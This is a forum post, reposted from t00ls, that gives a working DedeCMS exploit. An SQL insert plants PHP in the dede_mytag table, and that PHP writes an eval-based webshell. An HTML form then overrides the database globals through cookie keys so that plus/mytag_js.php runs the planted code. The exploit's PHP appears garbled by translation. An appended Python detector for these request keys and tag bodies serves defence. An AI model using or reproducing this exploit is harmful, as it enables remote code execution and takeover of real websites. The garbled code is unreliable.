Transferred from: t00ls
An exploit circulating on the internet. Its notes say the backend can be used only if the plus directory exists and the server can connect externally.
Prerequisites: You must prepare your own Dede database and then insert the data:
Insert into dede_mytag (aid, normbody) values (1, '{Dede: PhP} $ fp = @ fopen ("1.php", \ 'a \'); @ fwrite ($ FP, \ '<? PHP eval ($ _ post [c])?> \ '); Echo "OK"; @ fclose ($ FP); {/Dede: PhP }');
Submit using the following form, and the shell will be 1.php in the same directory. Work out the principle yourself...
<form action="" method="post" name="quicksearch" id="quicksearch">
<input type="text" value="http://localhost:8080/plus/mytag_js.php?Aid=1" name="doaction" style="width:400"><br/>
<input type="text" value="dbhost" name="_cookie[globals][mongo_dbhost]" style="width:400"><br/>
<input type="text" value="dbuser" name="_cookie[globals][pai_dbuser]" style="width:400"><br/>
<input type="text" value="dbpwd" name="_cookie[globals][mongo_dbpwd]" style="width:400"><br/>
<input type="text" value="dbname" name="_cookie[globals][mongo_dbname]" style="width:400"><br/>
<input type="text" value="Dede_" name="_cookie[globals][pai_dbprefix]" style="width:400"><br/>
<input type="text" value="true" name="nocache" style="width:400">
<input type="submit" value="Submit" name="quicksearchbtn"><br/>
</form>
<script>
function addaction()
{
document.quicksearch.action = document.quicksearch.doaction.value;
}
</script>
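For defenders, the two artifacts this post relies on can be checked for directly: request keys shaped like `_cookie[globals][..._dbhost]` that try to override database settings, and a `dede_mytag` body that embeds PHP which writes files or evaluates input. The following is an added example, not part of the original post; the function names, the wider list of superglobal names and risky calls, and the sample data are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl

# Request keys that address a superglobal through user input, in the shape the
# form above uses: _cookie[globals][<prefix>_dbhost]. Matched case-insensitively.
SUPERGLOBAL_KEY = re.compile(
    r"^_(get|post|cookie|request|server|files)\[globals\]\[(\w+)\]$", re.I)
DB_SETTING = re.compile(r"_(dbhost|dbuser|dbpwd|dbname|dbprefix)$", re.I)
# Stored tag bodies that embed PHP, and calls inside them that write or run code.
PHP_TAG = re.compile(r"\{\s*dede:\s*php\s*\}(.*?)\{\s*/dede:\s*php\s*\}", re.I | re.S)
RISKY_CALL = re.compile(r"\b(fopen|fwrite|file_put_contents|eval|assert)\s*\(", re.I)


def flag_request(path, body):
    """Return (kind, path, key) findings for one URL-encoded request body."""
    findings = []
    for name, _value in parse_qsl(body, keep_blank_values=True):
        m = SUPERGLOBAL_KEY.match(re.sub(r"\s+", "", name))
        if m:
            kind = "db-override" if DB_SETTING.search(m.group(2)) else "superglobal-key"
            findings.append((kind, path, name))
    return findings


def flag_tag_body(normbody):
    """Return the sorted risky calls found inside {dede:php} blocks."""
    calls = set()
    for block in PHP_TAG.findall(normbody):
        calls.update(c.lower() for c in RISKY_CALL.findall(block))
    return sorted(calls)


# Constructed samples (not captured traffic or real table rows).
SAMPLE_REQUESTS = [
    ("/plus/mytag_js.php?aid=1", "_cookie%5Bglobals%5D%5Bmongo_dbhost%5D=dbhost&nocache=true"),
    ("/index.php", "q=hello&nocache=true"),
]
SAMPLE_TAGS = [
    '{dede:php}$f = fopen("x.txt", "a"); fwrite($f, "hi");{/dede:php}',
    '{dede:php}echo date("Y");{/dede:php}',
]

if __name__ == "__main__":
    for path, body in SAMPLE_REQUESTS:
        print(path, flag_request(path, body))
    for tag in SAMPLE_TAGS:
        print(flag_tag_body(tag))
```

Run `flag_request` over decoded POST bodies from web server or WAF logs, and `flag_tag_body` over each `normbody` value exported from the `dede_mytag` table.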